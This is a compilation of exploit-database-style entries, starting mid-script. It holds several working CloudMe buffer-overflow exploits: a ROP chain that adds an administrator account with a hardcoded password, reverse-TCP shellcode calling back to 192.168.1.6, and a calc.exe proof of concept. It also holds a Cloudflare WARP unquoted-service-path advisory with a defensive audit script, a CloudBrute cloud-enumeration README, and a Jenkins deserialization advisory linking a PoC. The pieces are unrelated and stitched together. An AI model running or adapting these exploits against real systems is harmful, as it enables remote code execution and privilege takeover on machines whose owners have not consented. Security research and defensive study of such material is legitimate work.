        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        0x6990F972, # RETN 10 [Qt5Network.dll]
        # PUSHAD - Setup Call to MSVCRT.system on stack
        0X68f7bc5e  # pushad # ret # [Qt5Core.dll]
    ]
    print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!"))
    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def sendRecv(s,p):
    print(formatMsg("Sending payload: "))
    print(S[3]+F[7]+payload+S[0])
    s.send(p)
    data = s.recv(1024)
    return data
def header():
    head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0]
    return head
def sig():
    SIG = S[3]+F[4]+" .-----.._ ,--.\n"
    SIG += F[4]+" | .. > ___ | | .--.\n"
    SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n"
    SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n"
    SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n"
    SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
    SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
    return SIG
def footer():
    foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n')
    return foot
if __name__ == "__main__":
    print(header())
    print(sig())
    print(footer())
    if len(sys.argv) != 3:
        print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0]))
        print(formatErr("Example: python %s '127.0.0.1' 8888" % sys.argv[0]))
        sys.exit(-1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain()
    os_EIP = '\x41'*1052
    os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain))
    nSEH = '\x42'*4
    SEH = '\x43'*4
    buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH
    term = '\r\n'
    kern32 = 'msvcrt.dll'+'AAAAAA'
    winExe = 'system'+'BBBBBB'
    addUsr = 'net user boku 0v3R9000! /add'+'CCCC'
    addAdm = 'net localgroup Administrators boku /add'+'DDDD'
    rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm))
    payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host,port))
        print(formatMsg( "Successfully connected to "+host+" on port "+str(port)))
        resp = sendRecv(sock,payload)
        print(formatMsg("Closing Socket"))
        sock.close()
        print(formatErr("Exiting python script."))
    except:
        print(formatErr("Failed to connect and send payload."))
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Date: 2020-05-20
# Exploit Author: Xenofon Vassilakopoulos
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. On your local machine start the CloudMe service.
# 2. Regenerate the reverse TCP shellcode with the IP and port of your host using the following command
# msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
# 3. Run the python script.
import struct
import socket
target = "127.0.0.1"
########################################################################
# Get kernel32 address from the stack
# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe
# '<L' forces a 4-byte little-endian DWORD; native 'L' is 8 bytes on 64-bit
# Linux/macOS Python and would break the layout of the chain.
rop = struct.pack('<L',0x699012c9) # POP EBP # RETN [Qt5Network.dll]
rop+= struct.pack('<L',0x0385FF88) # Offset
rop+= struct.pack('<L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0x0362fffc) # Offset
rop+= struct.pack('<L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]
# Calculate VirtualProtect relative to the leaked kernel32 address
rop+= struct.pack('<L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0xfffae493) # Offset
rop+= struct.pack('<L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll]
########################################################################
# Setup VirtualProtect
# edi
rop+= struct.pack('<L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll]
rop+= struct.pack('<L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll]
# esi
rop+= struct.pack('<L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect
# edx
rop+= struct.pack('<L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop+= struct.pack('<L',0x41414141) # Filler
rop+= struct.pack('<L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll]
# ebx
rop+= struct.pack('<L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0xfffffdff) # Value to negate, will become 0x00000201
rop+= struct.pack('<L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll]
rop+= struct.pack('<L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll]
# ebp
rop+= struct.pack('<L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll]
rop+= struct.pack('<L',0x6d9c12c9) # skip 4 bytes
# eax & ecx
rop+= struct.pack('<L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll]
rop+= struct.pack('<L',0x90909090) # NOP
rop+= struct.pack('<L',0x68ee6b16) # &Writable location [Qt5Core.dll]
# push registers to stack
rop+= struct.pack('<L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll]
rop+= struct.pack('<L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll]
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf = b""
buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"
##########
junk1 = b"\x41"*1604   # bytes literals so the concatenation also works on Python 3
nops = b"\x90"*16
junk2 = b"C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
seh = struct.pack('<L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll]
payload = junk1 + rop + nops + buf + junk2 + seh
try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    s.send(payload)
except Exception as e:
    print(e)  # sys.exc_value was Python 2 only and sys was never imported
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    s.send(buf)
except Exception as e:
    print(e)  # sys.exc_value was Python 2 only and sys was never imported
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es
C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CloudflareWARP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cloudflare WARP
DEPENDENCIES : wlansvc
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
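As an added example (not part of the advisory), a small Python audit that parses "sc qc" output like the listing above, flags services whose BINARY_PATH_NAME is unquoted and contains spaces, lists the locations whose ACLs a defender must check, and prints the "sc config" remediation. The function names, the QuotedSvc entry and the log text are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample input: the advisory's 'sc qc CloudflareWARP' lines plus a
# correctly quoted service (QuotedSvc is made up) for contrast.
SC_QC_OUTPUT = r"""
SERVICE_NAME: CloudflareWARP
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: QuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Some Vendor\svc.exe" --run
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text: str) -> Dict[str, str]:
    """Map SERVICE_NAME -> BINARY_PATH_NAME from one or more 'sc qc' dumps."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME\s*:\s*(\S+)", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", line)
        if m and current:
            services[current] = m.group(1)
    return services

def search_candidates(binary_path: str) -> List[str]:
    """Executables Windows would try *before* the real one when an unquoted
    path contains spaces (each space-delimited prefix + '.exe'). An empty
    list means the path is quoted or space-free, i.e. not affected. These
    are the locations whose write ACLs must be verified."""
    if binary_path.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)", binary_path, re.IGNORECASE)
    exe = (m.group(1) if m else binary_path).replace("\\\\", "\\")
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def audit_unquoted(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Return only the affected services, each with its lookup candidates."""
    return {n: c for n, p in services.items() if (c := search_candidates(p))}

def quoted_fix(name: str, binary_path: str) -> str:
    """The 'sc config' command that remediates by quoting the path."""
    exe = binary_path.replace("\\\\", "\\")
    return f'sc config {name} binPath= "\\"{exe}\\""'
```

Run the audit against the output of "sc qc" for every service (or the PathName column of Win32_Service) and treat any non-empty result as a finding until the candidate directories are confirmed non-writable by standard users.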
A tool to find a company's (target's) infrastructure, files and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The results are useful for bug bounty hunters, red teamers and penetration testers.
A full write-up is available here.
Motivation
We have always wanted something that could be automated to make black-box security testing easier. We discussed the idea of building a multi-platform cloud brute-force hunter: one that finds open storage buckets, applications and databases hosted on the cloud, possibly behind a proxy.
This is the list of problems with previous approaches that we tried to fix:
- separate words
- lack of proper concurrency
- lack of support for all major cloud providers
- require authentication or keys or cloud CLI access
- outdated endpoints and regions
- incorrect file storage detection
- lack of support for proxies (useful for bypassing region restrictions)
- lack of support for user agent randomization (useful for bypassing rare restrictions)
- hard to use, poorly configured
Features
- Cloud detection (IPINFO API and source code)
- Supports all major providers
- Black-box (unauthenticated)
- Fast (concurrent)
- Modular and easily customizable
- Cross-platform (Windows, Linux, Mac)
- User-agent randomization
- Proxy randomization (HTTP, SOCKS5)
Supported cloud providers
- Microsoft: Storage, Apps
- Amazon: Storage, Apps
- Google: Storage, Apps
- DigitalOcean: Storage
- Vultr: Storage
- Linode: Storage
- Alibaba: Storage
Version
1.0.0
Usage
Just download the latest release for your operating system and follow the usage below.
To get the most out of this tool, you must understand how to configure it correctly. When you open the downloaded release there is a config folder containing a config.yaml file.
It looks like this:
Providers: ['Amazon','Alibaba','Amazon','Microsoft','Digitalocean','Linode','Linode','fultr','Google'] # supported providers
Environments: ['test','dev','prod','stage','staging','bak'] # used for mutations
proxytype: 'http' # socks5/http
ipinfo: '' # ipinfo.io API key
ipinfo API: you can register on ipinfo.io and get a free key. Environments are used to generate URLs, e.g. test-keyword.target.region, test.keyword.target.region, and so on.
We provide some word lists, but it is better to customize and minimize your word lists (based on your recon) before running the tool.
Once the API key is set, you can use CloudBrute.
V 1.0.7
Usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
                  -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
                  <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
                  [-a|--randomagent "<value>"] [-D|--debug] [-q|--quiet]
                  [-m|--mode "<value>"] [-o|--output "<value>"]
                  [-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
  -h  --help          Print help information
  -d  --domain        domain
  -k  --keyword       keyword used to generate URLs
  -w  --wordlist      path to wordlist
  -c  --cloud         force a search, check the config.yaml providers list
  -t  --threads       number of threads. Default: 80
  -T  --timeout       timeout per request in seconds. Default: 10
  -p  --proxy         use proxy list
  -a  --randomagent   user agent randomization
  -D  --debug         show debug logs. Default: false
  -q  --quiet         suppress all output. Default: false
  -m  --mode          storage or app. Default: storage
  -o  --output        output file. Default: out.txt
  -C  --configFolder  config path. Default: config
For example:
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
Note: the keyword is used to generate URLs, so if you want the full domain to be part of the mutations, use it for both the domain (-d) and keyword (-k) parameters.
If the cloud provider is not detected, or you want to force a search on a specific provider, use the -c option:
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c Amazon -o target_output.txt
Dev
- Clone the repo
- go build -o CloudBrute main.go
- go test internal
In action
How to contribute
Add a module or fix something, then send a pull request. Share it with people you think could use it. Do the extra work and share with the community.
FAQ
How do I get the most out of this tool?
Share your findings.
I get errors; what should I do?
Make sure you have read the usage correctly; if you think you have found a bug, open an issue.
When I use a proxy I get too many errors, or it is too slow?
That is because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify good proxies with your chosen providers.
Too fast or too slow?
Change the -T (timeout) option to get the best results.
Credits
Inspired by every repo listed here.
Source: https://blogs.securiteam.com/index.php/archives/3171
Vulnerability Details
Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.
The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.
The first request starts a session for the bi-directional channel and is used for "downloading" data from the server. The HTTP header "Session" is the identifier for the channel; the HTTP header "Side" specifies the "downloading/uploading" direction.
The second request is the sending component of the bidirectional channel. The first request is blocked until the second request is sent. The two requests are matched to the same channel by the "Session" HTTP header, which is just a UUID.
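As an added detection example (not part of the advisory or its PoC), the pairing described above can be reconstructed from proxy or access logs: group requests by the "Session" header, and report channels where both directions were seen, by whom, and whether the Session value is actually a UUID. The log format is constructed, and the "Side" values "download" and "upload" are an assumption about the header's literal contents.

```python
import re
import uuid
from collections import defaultdict
from typing import Dict, List

# Constructed sample log (not real Jenkins or proxy output): one line per
# request, with the two channel headers copied into key=value fields.
SAMPLE_LOG = """
10.0.0.5 session=2a3e2c9e-5b7d-4a7f-9a7a-1f3c2d4e5f60 side=download
10.0.0.5 session=2a3e2c9e-5b7d-4a7f-9a7a-1f3c2d4e5f60 side=upload
10.0.0.9 session=not-a-uuid side=upload
10.0.0.7 session=7c9d1e2f-3a4b-4c5d-8e6f-0a1b2c3d4e5f side=download
"""

def parse_log(text: str) -> List[Dict[str, str]]:
    """Extract source, Session and Side from each constructed log line."""
    recs = []
    for line in text.strip().splitlines():
        m = re.match(r"(\S+) session=(\S+) side=(\S+)", line)
        if m:
            recs.append({"src": m.group(1), "session": m.group(2),
                         "side": m.group(3).lower()})
    return recs

def is_canonical_uuid(value: str) -> bool:
    """The advisory says Session is 'just a UUID'; anything else is suspect."""
    try:
        return str(uuid.UUID(value)) == value.lower()
    except ValueError:
        return False

def pair_channels(records: List[Dict[str, str]]) -> Dict[str, dict]:
    """Group requests by Session and report which channels were completed
    (both directions seen, i.e. the blocked first request was released by
    a second one), which sources took part, and malformed Session values."""
    seen = defaultdict(lambda: {"sides": set(), "srcs": set()})
    for r in records:
        seen[r["session"]]["sides"].add(r["side"])
        seen[r["session"]]["srcs"].add(r["src"])
    return {
        sess: {
            # assumption: Side carries the literal words "download"/"upload"
            "complete": {"download", "upload"} <= ch["sides"],
            "malformed_session": not is_canonical_uuid(sess),
            "sources": sorted(ch["srcs"]),
        }
        for sess, ch in seen.items()
    }
```

A completed channel from a source that never otherwise talks to Jenkins, or one whose two halves come from different sources, is the event worth alerting on.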
Proof of Concept
To exploit the vulnerability, an attacker first creates a serialized payload containing the command to execute by running the payload.jar script.
The second step is to edit the Python script jenkins_poc1.py:
- Adjust the target URL in the URL variable
- Change the file opened in the line FILE_SER = open("jenkins_poc1.ser", "rb").read() to your payload file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip